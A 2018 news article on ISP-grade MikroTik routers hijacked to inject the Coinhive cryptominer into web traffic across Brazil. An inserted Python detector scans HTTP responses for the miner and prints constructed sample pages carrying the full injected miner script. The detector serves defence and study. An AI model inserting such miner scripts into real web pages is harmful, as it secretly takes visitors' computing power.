ISPs were patient zero in a mass cryptojacking wave hitting Brazil

Posted: 7 August 2018 4:17 am

That’s why you keep your software up to date.

Cryptojacking is when an attacker infects a victim’s computer with a cryptocurrency miner, and then leeches their computing power for profit. Cryptojackers quickly became the most popular type of malware by a very large margin, often striking victims through creative attack vectors where traditional malware would probably have failed.

It looks like someone recently found another brand new attack vector, targeting carrier-grade MikroTik routers used by ISPs through an old vulnerability, and from there infecting about 200,000 Internet connections across Brazil and elsewhere.

The infection was discovered by Simon Kenin of Trustwave SpiderLabs on 31 July, when he picked up an unusual surge of cryptojacking activity in Brazil. He quickly ruled out a coincidence by noticing that all the infections were MikroTik network devices, and that all of the mining returns were going to the same entity.

By following tales of frustrated users, Kenin concluded that the Internet service providers themselves had their MikroTik routers compromised to mine cryptocurrency through their customers’ computers.

The underlying vulnerability was patched almost immediately after its discovery on 23 April, but not all MikroTik users actually bothered to install the update.

By getting in through slacking ISPs, the attacker could hit all their customers, netting some 200,000 devices in short order. These devices would then inject the Coinhive mining script into web pages visited by the user.

To make matters worse for the victims, and better for the attacker, the attack also hit websites behind infected routers. So business servers using unpatched MikroTik routers and hosting websites would also cryptojack visitors to the site, regardless of where they were visiting from.

“Let me emphasise how bad this attack is,” Kenin wrote. “The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices. There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily.

“Allegedly, each user would have initially gotten the CoinHive script regardless of which site they visited. Even if this attack only works on pages that return errors, we’re still talking about potentially millions of daily pages for the attacker.”
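The injection described above rewrites HTTP responses in transit, so the defender-side check is to look at what the browser actually received rather than at the origin server. The following is an added example, not code from the article or from Trustwave's writeup: it scans captured HTTP responses for the Coinhive loader and for the site key that ties mining revenue to one account, flags whether the hit was on an error page, and groups hits by site key, mirroring Kenin's observation that all of the mining returns were going to the same entity. The sample responses, the `.invalid` hostnames and the site key are constructed; the loader URL and the `CoinHive.Anonymous(...)` call reflect how the Coinhive library was commonly embedded, which is an assumption about this campaign, not something the article reproduces.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# Indicators for the Coinhive browser miner as it was commonly embedded:
# a <script src=".../coinhive.min.js"> loader followed by an inline
# "new CoinHive.Anonymous('<site key>')" call. These are assumed-typical
# patterns, not indicators reproduced from the article or Trustwave's writeup.
COINHIVE_LOADER = re.compile(
    r'<script[^>]+src=["\'][^"\']*coinhive[^"\']*["\']', re.IGNORECASE)
COINHIVE_SITEKEY = re.compile(
    r'CoinHive\.Anonymous\(\s*["\']([A-Za-z0-9_\-]+)["\']', re.IGNORECASE)


@dataclass
class Finding:
    url: str
    status: int
    site_key: Optional[str]   # account the mining revenue is credited to
    loader_present: bool      # external coinhive.min.js loader seen
    error_page: bool          # injected into an HTTP error response


def inspect_response(url: str, status: int, body: str) -> Optional[Finding]:
    """Return a Finding if the response body carries a Coinhive miner, else None."""
    loader = COINHIVE_LOADER.search(body) is not None
    key_match = COINHIVE_SITEKEY.search(body)
    if not loader and key_match is None:
        return None
    return Finding(
        url=url,
        status=status,
        site_key=key_match.group(1) if key_match else None,
        loader_present=loader,
        error_page=status >= 400,
    )


def summarize(responses: Iterable[Tuple[str, int, str]]) -> Dict[str, List[str]]:
    """Group infected URLs by site key, so one key across many ISPs stands out.

    Hits without an extractable key are collected under "<no key>".
    """
    groups: Dict[str, List[str]] = {}
    for url, status, body in responses:
        finding = inspect_response(url, status, body)
        if finding is None:
            continue
        groups.setdefault(finding.site_key or "<no key>", []).append(finding.url)
    return {key: sorted(urls) for key, urls in groups.items()}


# Constructed sample traffic: two customers of different ISPs receive the
# same injected miner (one on a 404 page), a third response is clean.
SAMPLE_RESPONSES = [
    ("http://example-isp-a.invalid/missing", 404,
     '<html><head><title>404 Not Found</title>'
     '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
     "<script>var miner=new CoinHive.Anonymous('ConstructedSiteKey000');"
     "miner.start();</script></head><body>Not Found</body></html>"),
    ("http://example-isp-a.invalid/", 200,
     "<html><body>Welcome</body></html>"),
    ("http://example-isp-b.invalid/login", 200,
     '<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script>'
     '<script>new CoinHive.Anonymous("ConstructedSiteKey000").start();</script>'
     "</head></html>"),
]

if __name__ == "__main__":
    for key, urls in summarize(SAMPLE_RESPONSES).items():
        print(f"site key {key}: {len(urls)} infected response(s)")
        for u in urls:
            print(f"  {u}")
```

Run against response bodies captured on the client side of the router (a proxy log, a packet capture, or a browser's saved page), a single site key recurring across customers of unrelated ISPs is the signal that the injection sits upstream, in the network path, rather than on any one website; the `error_page` flag separates the error-page-only variant Kenin describes from injection into ordinary pages.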

Disclosure: At the time of writing, the author holds ETH, IOTA, ICX, VET, XLM, BTC and ADA.
